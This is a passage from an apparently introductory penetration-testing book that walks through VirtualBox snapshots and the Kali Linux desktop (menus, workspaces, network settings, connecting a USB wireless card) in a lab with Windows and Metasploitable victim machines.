, and we will give it a description, saying it's a fresh snapshot, with no updates. It's always a good idea to give a meaningful name and description, so that in the future, we can actually remember what the snapshot stands for:

So now that we are done, we can click on

OK

, and we will have the

Current State

. We can update or install programs, and even install libraries, and, if we break something and/or want to go back to the fresh install, we can click on

Fresh Install

to restore it.

Now, we can go back to the normal details and start our virtual machine. We will see an example now. Let us create a new directory in Kali Linux—we are going to call it test. Let's suppose that we actually updated the system; when we update the system, there is a good chance that some programs will not be as up to date as the libraries that will be installed, and these programs might start having issues. If this happens, it is recommended to go back to, or downgrade to, an older version, without the update.

All we have to do is go back to the fresh installation. We just created a new file to show that once you go back, everything will go back to how it was before changes were made. Turning off Kali, if we go back to the snapshots, we will see the Current State (the state that has been changed). If we updated and the update was successful, we can also create a snapshot called Updated System, including the date, and a description, such as updated with no problems. Clicking on OK, we will then see two snapshots—Fresh Install and Updated System.

If we have problems after updating, all we have to do is just click on the Fresh Install that we just created, and then click on the restore icon to restore changes. Now, if we start the Kali machine, we will see that the new directory that we created disappeared. We're back to where we were without the new directory, without anything, so we are actually back to the fresh installation of Kali, to when we actually took the snapshot.

Let's suppose that we have gone back in time to our fresh installation, and for some reason we want to go to our updated state to see if we can fix the issue (perhaps by finding a solution online). If we want to go to a future state, we can just click on Updated System, then Restore, and—without creating a snapshot from the Current State—start the machine. We'll be back to the updated state, to where we had the new directory created, the test directory.

As you can see, snapshots can be really useful. They allow us to bookmark the state of the operating system, so that we can actually have different configurations, switching between them as we please. Snapshots are also really useful if we have installed Windows, because Windows actually gives us a trial version, and we can go back to our fresh installation of Windows if there are problems in the future.

Summary

In this chapter, we learned how to use VirtualBox, which allows us to install machines such as Kali Linux, and Windows, inside our own machine. We also learned how to install Kali Linux, which is going to be our attacking machine throughout the book, and how to install our victim machines, Windows and Metasploitable. Lastly, we studied what snapshots are, and how they can help us to retain our past setups in the virtual environment.

In upcoming chapters, we will see how to use the Kali Linux machine to attack both the Windows machine and the Metasploitable machine.

Linux Basics

In this chapter, we will be covering the basics of Kali Linux. We will see how Kali Linux looks when installed as a virtual machine, and some of the basic elements of Kali Linux will be explained in detail. Furthermore, into the chapter, we will learn about the different commands that we can use in a Linux Terminal. Once we have learned how to use the commands, we will see how to update sources, and how to install programs on Linux.

In this chapter, we will cover the following topics:

Overview of Kali Linux

Linux commands

Updating sources

Overview of Kali Linux

Now that we have Kali Linux installed, let me provide you with an overview of the system: what Linux is, the filesystems structure, and some of the basic apps that we are going to use. We will see an overview of the system now, and later, we will walk through some commands, which we will see in more detail in later chapters.

Status bar icons

As you can see, in the following screenshot, there is a status bar at the top, and toward the end (on the left-hand side of the Applications menu), there is an Applications tab to access all of the applications that come preinstalled with Kali Linux. These are divided into categories, in terms of the type of attack that they allow you to carry out. We can see the following: 01 – Information Gathering, 02 – Vulnerability Analysis, 03 – Web Applications Analysis, 04 – Databases Assessment, 08 – Exploitation Tools, and 07 – Reverse Engineering. These are all types of applications that can be used for penetration testing:

The Places menu allows you to access your filesystems - the files that you will be using. This is similar to My Documents in Windows machines. If we click on Computer, we can access all of the files and devices, but we rarely use this menu; we usually access it through the Home icon on the vertical bar toward the left. If we go to Places and then to Home, we can get access to Desktop, Documents, Downloads, Music, and so on, the same way that you would in Windows or macOS X. We can even see Trash, which is where your trash goes. This is just a basic file manager, with back and forward, and you can double-click on a file to run it or double-click on a directory to open it:

To the right, there is an icon called Workspaces; in here, you can see the number of desktops, or workspaces. Linux usually supports workspaces, so you can have different windows on different workspaces; if you don't have other windows open, you can't use the next workspace. However, for example, if you have a file manager open here, you can go to the next workspace and it will be empty, and then you can have something else running there. You can use as many workspaces as you want, and it's easy to switch between them. We will be using them when we perform our penetration testing attacks.

Now, toward the right of the workspace icon, you can have a keyboard icon, if you have more than one keyboard and want to switch between them:

We then have our networks icon, as seen in the following screenshot. With it, we can access wired and wireless networks. One thing to note is that we will not be able to access our internal wireless card through a virtual machine. We have set the settings of the computer to be connected through NAT, which means that it has an internet connection, but the internet connection is coming through a host machine. So, there is actually a virtual network set up between this device and the main device. This device only has internet access because of the internet access provided by the main machine:

Here, we can also change the volume from the same menu; we can turn off the computer, lock it, or enter the preferences, too. These are just normal preferences; you should familiarize yourself with them. They include Backgrounds, Notifications, Displays, Mouse, and Networks. We then have battery settings, which can be accessed from the status bar. Applications and Places are the objects we'll be using the most, and you can access your network settings from them.

Connecting the wireless card

If we have a wireless card connected, we will be able to see the available networks. If we want to connect a wireless card (I have a USB wireless card), we can do the following:

Go to the

Devices

menu on the menu bar, then go to

USB

. This procedure is the same, regardless of the USB device that you connect (wireless, memory stick, and so on). Go to

Devices | USB

, then select the device you want to connect.

So we connected a wireless card, and the chipset that's used in the card is called

Ralink 802.11 n WLAN [0101]

. This is the wireless card, and we are going to click on it. That should connect it to the Kali machine:

G

o to the wireless icon on the status bar,

go to the

Select Network

option in

Wi-Fi Not Connected

, and then select a network. Then, we can see the networks that are available around us, and we can select any network that we want to connect to; just enter the password in, and connect to the network normally, the way you would connect to any other network:

Even if we disconnect our wireless card now, we will see that we still have an internet connection, because our main machine (a macOS X, for example) is connected to a network, and this virtual machine is connected to the Mac machine via an internal virtual network. So, the browser that comes with Kali Linux is Firefox ESR, and we can go to Google and check that we have an internet connection.

Linux commands

These are not hacking commands; they're not penetration testing commands. They're just commands used in Linux that allow us to do different things on the operating system.